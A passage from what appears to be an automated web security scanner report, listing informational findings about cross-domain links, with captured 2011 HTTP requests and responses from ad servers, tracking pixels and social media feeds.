GET /p/fetch/origin==http%3A%2F%2Ftwitter.com%2Fstatuses%2Fuser_timeline%2Faidswalkboston.atom?token=095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168 HTTP/1.1
Host: p.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=48916
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=900,public
Content-Type: application/atom+xml;charset=utf-8
Date: Tue, 26 Apr 2011 21:44:45 GMT
Last-Modified: Tue, 26 Apr 2011 21:34:14 GMT
Server: ECS (dca/5338)
X-Cache: HIT
Content-Length: 21241

<?xml version="1.0" encoding="UTF-8"?>
<feed xml:lang="en-US" xmlns:georss="http://www.georss.org/georss" xmlns="http://www.w3.org/2005/Atom" xmlns:twitter="http://api.twitter.com">
<title>Twitter /
...[SNIP]...
</id>
<link type="text/html" href="http://twitter.com/aidswalkboston" rel="alternate"/>
<link type="application/atom+xml" href="http://twitter.com/statuses/user_timeline/aidswalkboston.atom" rel="self"/>
<updated>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62942780007260160" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62933830507577344" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62916789805395968" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62916778694684672" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62909940959940608" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62897533281763329" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62866056993181696" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62850361223942145" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62662195720368128" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62647152312205313" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62642470923665408" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62605590861594624" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62552738411720704" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62507445838286848" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62490817859817473" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62335063764897793" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62299794395250688" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62234365500997632" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/62156356702056469" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...
</updated>
<link type="text/html" href="http://twitter.com/aidswalkboston/statuses/61981443450081280" rel="alternate"/>
<link type="image/png" href="http://a3.twimg.com/profile_images/1309308862/AWB5K-Logo-2011-Transparent_normal.png" rel="image"/>
<author>
...[SNIP]...

19.73. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.widgetserver.com
Path:   /p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750?token=095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168 HTTP/1.1
Host: p.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=48916
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=900,public
Content-Type: application/atom+xml
Date: Tue, 26 Apr 2011 21:45:03 GMT
Last-Modified: Tue, 26 Apr 2011 21:45:03 GMT
Server: ECS (dca/533B)
X-Cache: HIT
Content-Length: 45545

<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:activity="http://activitystrea.ms/spec/1.0/" xmlns:fb="http://www.facebook.com" xmlns:access="http://www.blogline
...[SNIP]...
</title>
<link href="http://www.facebook.com/" />
<link rel="self" href="http://www.facebook.com/feeds/page.php?format=atom10&amp;id=95922227750" />
<updated>
...[SNIP]...
</id>
<link rel="alternate" type="text/html" href="http://www.facebook.com/photo.php?fbid=10150160430327751&amp;set=a.95925032750.100663.95922227750&amp;type=1&amp;comments" />
<published>
...[SNIP]...
</id>
<link rel="alternate" type="text/html" href="http://www.facebook.com/photo.php?fbid=10150155686777751&amp;set=a.95925032750.100663.95922227750&amp;type=1&amp;comments" />
<published>
...[SNIP]...
</id>
<link rel="alternate" type="text/html" href="http://www.facebook.com/photo.php?fbid=10150151725542751&amp;set=a.95925032750.100663.95922227750&amp;type=1&amp;comments" />
<published>
...[SNIP]...
</id>
<link rel="alternate" type="text/html" href="http://www.facebook.com/photo.php?fbid=472218727750&amp;set=a.95925032750.100663.95922227750&amp;type=1&amp;comments" />
<published>
...[SNIP]...
</id>
<link rel="alternate" type="text/html" href="http://www.facebook.com/note.php?note_id=10150104706236613&amp;comments" />
<published>
...[SNIP]...
</id>
<link rel="alternate" type="text/html" href="http://www.facebook.com/note.php?note_id=10150093794656613&amp;comments" />
<published>
...[SNIP]...
</id>
<link rel="alternate" type="text/html" href="http://www.facebook.com/note.php?note_id=10150092718301613&amp;comments" />
<published>
...[SNIP]...
</id>
<link rel="alternate" type="text/html" href="http://www.facebook.com/photo.php?fbid=460707612750&amp;set=a.95925032750.100663.95922227750&amp;type=1&amp;comments" />
<published>
...[SNIP]...

19.74. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3306&browse_products=160547 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303848180_12704:0_10164:104912_10638:104912_10640:104912_10641:104912_1437:104912_1660:668508; uid=1_1303848180_1303179323923:6792170478871670; kwd=1_1303848180_11317:104912_11717:104912_11718:104912_11719:104912; sit=1_1303848180_3306:0:0_719:105739:104912_2451:156608:151508_3236:314571:314453_782:668857:668508; cre=1_1303848180; bpd=1_1303848180; apd=1_1303848180; scg=1_1303848180; ppd=1_1303848180; afl=1_1303848180

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303848202_15758:0_12704:0_12704:22_10164:104934_10638:104934_10640:104934_10641:104934_1437:104934_1660:668530; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: uid=1_1303848202_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: kwd=1_1303848202_11317:104934_11717:104934_11718:104934_11719:104934; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: sit=1_1303848202_3306:22:0_719:105761:104934_2451:156630:151530_3236:314593:314475_782:668879:668530; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: cre=1_1303848202; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: bpd=1_1303848202_1ZCU5:0; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: apd=1_1303848202; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: scg=1_1303848202; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: ppd=1_1303848202; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: afl=1_1303848202; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 26 Apr 2011 20:03:22 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 742

<!-- campaign #12704 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...
<!-- matched campaign #15758 is eligible -->
<img width=1 height=1 border=0 src="http://ad.trafficmp.com/a/bpix?adv=652&id=1561&format=image&r=">
<img src="http://pixel.rubiconproject.com/tap.php?v=6552|1" border="0" width="1" height="1" />
<img src="http://idcs.interclick.com/Segment.aspx?sid=93da1b37-e1d8-4a3d-98bc-070baa31f827"/>
<img src="http://ads.exactdrive.com/seg?add=83633&t=2" width="1" height="1" />
<script src="http://ad.adtegrity.net/pixel?id=1236911&t=1" type="text/javascript"></script>
...[SNIP]...

19.75. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVXTA&AP=1440 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1281
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8614954-T30580561-C1693696
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:23 GMT
Content-Length: 1281


//<![CDATA[
var contents_86 = '<span><a target="_blank" href="http://g.msn.com/0AD00001/1693696.1?!&amp;&amp;PID=8614954&amp;UIT=G&amp;TargetID=30580561&amp;AN=1243169022&amp;PG=INVXTA">Join TD Ame
...[SNIP]...
</span><img src="http://ad.doubleclick.net/ad/N3941.msn/B5325532;sz=1x1;pc=[TPAS_ID];ord=[timestamp]?" height="1" width="1" style="display:none;" />';
var fh_86 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

19.76. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVPFO&AP=1402 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC01=FB=AgIAtw5ZB7gB3fW4AQ; FC05=FB=AgEAtw4P67gB; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37; FC06=FB=AgIAtw4Q67gBrPm4AQ

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2713
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8568160-T37577241-C120000000000044726
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:45:31 GMT
Content-Length: 2713


//<![CDATA[
function getRADIds() { return{"adid":"120000000000044726","pid":"8568160","targetid":"37577241"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 954, 60);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_587287327() {var adCode_587287327=new Array();adCode_587287327.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&amp;&amp;PID=8568160&amp;UIT=G&amp;TargetID=37577241&amp;AN=587287327&amp;PG=INVPFO&amp;ASID=9efeaf17d15b47aba4dfc2bcb42e5b17&destination=;ord=587287327?" WIDTH=954 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_587287327.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5506.MSN/B5070033.105;abr=!ie;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.
...[SNIP]...

19.77. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INV4QC&AP=1026 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2781
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8013955-T8303500-C31000000000039414
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:56 GMT
Content-Length: 2781


//<![CDATA[
function getRADIds() { return{"adid":"31000000000039414","pid":"8013955","targetid":"8303500"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);if(parent
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_805437803() {var adCode_805437803=new Array();adCode_805437803.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003H/31000000000039414.1?!&amp;&amp;PID=8013955&amp;UIT=G&amp;TargetID=8303500&amp;AN=805437803&amp;PG=INV4QC&amp;ASID=ffd2abd4093544b9a0ee74b8349ad9b0&destination=;ord=805437803?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_805437803.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.no_url_specifiedOX2487/B5076164.3;abr=!ie;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http:
...[SNIP]...

19.78. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=MSNHQ2&AP=1402 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1045
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8479954-T22841720-C56000000000036466
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:34 GMT
Content-Length: 1045


//<![CDATA[
function getRADIds() { return{"adid":"56000000000036466","pid":"8479954","targetid":"22841720"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 100, 25);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0003S/56000000000036466.1??PID=8479954&amp;UIT=G&amp;TargetID=22841720&amp;AN=805833634&amp;PG=MSNHQ2&amp;ASID=ee767e6548014657949dbf347bdca0e6" target="_blank"><img src="http://ads2.msads.net/CIS/65/000/000/000/008/748.gif" width="100" height="25" alt="$7 Online Stock Trades! Click here to learn more!" border="0" /></a></div>');document.write('<img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1358.829.tk.100x25/805833634" alt="" height="1" width="1" style="display:none;" />');


document.close();

//]]>
...[SNIP]...

19.79. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVPFO&AP=1402 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2713
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8568160-T37577241-C120000000000044726
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:21 GMT
Content-Length: 2713


//<![CDATA[
function getRADIds() { return{"adid":"120000000000044726","pid":"8568160","targetid":"37577241"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 954, 60);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_185682764() {var adCode_185682764=new Array();adCode_185682764.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&amp;&amp;PID=8568160&amp;UIT=G&amp;TargetID=37577241&amp;AN=185682764&amp;PG=INVPFO&amp;ASID=122a4c2f808e4468a16efbaa5ef1b021&destination=;ord=185682764?" WIDTH=954 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_185682764.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5506.MSN/B5070033.105;abr=!ie;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.
...[SNIP]...

19.80. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=CP49XU&AP=1089 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; Sample=37; FC01=FB=AgIAtw5ZB7gB3fW4AQ; FC05=FB=AgEAtw4P67gB

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2786
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8370651-T8192380-C47000000000040614
